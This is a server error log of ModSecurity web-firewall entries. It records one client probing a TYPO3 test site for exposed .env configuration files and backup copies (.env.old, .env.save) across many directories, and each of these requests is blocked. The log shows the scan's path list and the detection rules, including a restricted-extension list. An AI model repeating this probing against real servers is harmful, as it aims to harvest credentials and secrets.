[Sun Nov 16 12:38:51.396224 2025] [:error] [pid 107823] [client 3.8.102.89:51932] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRm3y2ZlvYqdbt58w-ZoRAAAABA"]
[Sun Nov 16 12:38:51.396397 2025] [:error] [pid 107823] [client 3.8.102.89:51932] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRm3y2ZlvYqdbt58w-ZoRAAAABA"]
[Sun Nov 16 12:38:51.396548 2025] [:error] [pid 107823] [client 3.8.102.89:51932] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/src/.env.old"] [unique_id "aRm3y2ZlvYqdbt58w-ZoRAAAABA"]
[Sun Nov 16 12:38:51.400541 2025] [:error] [pid 113296] [client 3.8.102.89:51950] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aRm3y_7nuvXY8JVEGWXCggAAAA8"]
[Sun Nov 16 12:38:51.400708 2025] [:error] [pid 113296] [client 3.8.102.89:51950] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aRm3y_7nuvXY8JVEGWXCggAAAA8"]
[Sun Nov 16 12:38:51.400852 2025] [:error] [pid 113296] [client 3.8.102.89:51950] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aRm3y_7nuvXY8JVEGWXCggAAAA8"]
[Sun Nov 16 12:38:51.411701 2025] [:error] [pid 106377] [client 3.8.102.89:51598] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRm3y81A9uIKv4_seqC0YQAAAA4"]
[Sun Nov 16 12:38:51.411856 2025] [:error] [pid 106377] [client 3.8.102.89:51598] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRm3y81A9uIKv4_seqC0YQAAAA4"]
[Sun Nov 16 12:38:51.412008 2025] [:error] [pid 106377] [client 3.8.102.89:51598] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRm3y81A9uIKv4_seqC0YQAAAA4"]
[Sun Nov 16 12:38:51.412157 2025] [:error] [pid 106377] [client 3.8.102.89:51598] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aRm3y81A9uIKv4_seqC0YQAAAA4"]
[Sun Nov 16 12:38:51.447854 2025] [authz_core:error] [pid 111778] [client 3.8.102.89:51948] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Sun Nov 16 12:38:53.868748 2025] [:error] [pid 113274] [client 3.8.102.89:51966] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aRm3zY4DuVT7Zp3PDSdxJgAAAAE"]
[Sun Nov 16 12:38:53.870021 2025] [:error] [pid 113274] [client 3.8.102.89:51966] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aRm3zY4DuVT7Zp3PDSdxJgAAAAE"]
[Sun Nov 16 12:38:53.870283 2025] [:error] [pid 113274] [client 3.8.102.89:51966] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aRm3zY4DuVT7Zp3PDSdxJgAAAAE"]
[Sun Nov 16 12:38:53.899047 2025] [:error] [pid 107792] [client 3.8.102.89:51978] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRm3ze0VDMccOZESIOBvtgAAAAA"]
[Sun Nov 16 12:38:53.899214 2025] [:error] [pid 107792] [client 3.8.102.89:51978] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRm3ze0VDMccOZESIOBvtgAAAAA"]
[Sun Nov 16 12:38:53.899435 2025] [:error] [pid 107792] [client 3.8.102.89:51978] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRm3ze0VDMccOZESIOBvtgAAAAA"]
[Sun Nov 16 12:38:53.899605 2025] [:error] [pid 107792] [client 3.8.102.89:51978] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRm3ze0VDMccOZESIOBvtgAAAAA"]
[Sun Nov 16 12:38:53.918063 2025] [:error] [pid 113276] [client 3.8.102.89:51986] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aRm3zbXvaf1IcB4yJOvFAAAAAAU"]
[Sun Nov 16 12:38:53.918266 2025] [:error] [pid 113276] [client 3.8.102.89:51986] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aRm3zbXvaf1IcB4yJOvFAAAAAAU"]
[Sun Nov 16 12:38:53.918476 2025] [:error] [pid 113276] [client 3.8.102.89:51986] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aRm3zbXvaf1IcB4yJOvFAAAAAAU"]
[Sun Nov 16 12:38:53.934734 2025] [authz_core:error] [pid 113290] [client 3.8.102.89:51988] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Sun Nov 16 12:39:13.104752 2025] [authz_core:error] [pid 113296] [client 3.8.102.89:52776] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/includes
[Sun Nov 16 12:39:13.106398 2025] [:error] [pid 113283] [client 3.8.102.89:52766] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRm34Q0D7yRPJp9gclT4iAAAAAM"]
[Sun Nov 16 12:39:13.106561 2025] [:error] [pid 113283] [client 3.8.102.89:52766] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRm34Q0D7yRPJp9gclT4iAAAAAM"]
[Sun Nov 16 12:39:13.106767 2025] [:error] [pid 113283] [client 3.8.102.89:52766] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRm34Q0D7yRPJp9gclT4iAAAAAM"]
[Sun Nov 16 12:39:13.106922 2025] [:error] [pid 113283] [client 3.8.102.89:52766] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRm34Q0D7yRPJp9gclT4iAAAAAM"]
[Sun Nov 16 12:39:13.158560 2025] [:error] [pid 107823] [client 3.8.102.89:52792] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aRm34WZlvYqdbt58w-ZoRQAAABA"]
[Sun Nov 16 12:39:13.158768 2025] [:error] [pid 107823] [client 3.8.102.89:52792] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aRm34WZlvYqdbt58w-ZoRQAAABA"]
[Sun Nov 16 12:39:13.158920 2025] [:error] [pid 107823] [client 3.8.102.89:52792] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aRm34WZlvYqdbt58w-ZoRQAAABA"]
[Sun Nov 16 12:39:13.183998 2025] [:error] [pid 106377] [client 3.8.102.89:52772] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aRm34c1A9uIKv4_seqC0YgAAAA4"]
[Sun Nov 16 12:39:13.184193 2025] [:error] [pid 106377] [client 3.8.102.89:52772] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aRm34c1A9uIKv4_seqC0YgAAAA4"]
[Sun Nov 16 12:39:13.184350 2025] [:error] [pid 106377] [client 3.8.102.89:52772] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aRm34c1A9uIKv4_seqC0YgAAAA4"]
[Sun Nov 16 12:39:21.134514 2025] [:error] [pid 107814] [client 3.8.102.89:49076] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aRm36YYUzNZoYnjqey4--gAAAAc"]
[Sun Nov 16 12:39:21.134781 2025] [:error] [pid 107814] [client 3.8.102.89:49076] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aRm36YYUzNZoYnjqey4--gAAAAc"]
[Sun Nov 16 12:39:21.134988 2025] [:error] [pid 107814] [client 3.8.102.89:49076] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aRm36YYUzNZoYnjqey4--gAAAAc"]
[Sun Nov 16 12:39:21.143132 2025] [authz_core:error] [pid 113274] [client 3.8.102.89:49094] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/lib
[Sun Nov 16 12:39:21.151380 2025] [:error] [pid 107792] [client 3.8.102.89:49086] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aRm36e0VDMccOZESIOBvtwAAAAA"]
[Sun Nov 16 12:39:21.151563 2025] [:error] [pid 107792] [client 3.8.102.89:49086] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aRm36e0VDMccOZESIOBvtwAAAAA"]
[Sun Nov 16 12:39:21.151791 2025] [:error] [pid 107792] [client 3.8.102.89:49086] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aRm36e0VDMccOZESIOBvtwAAAAA"]
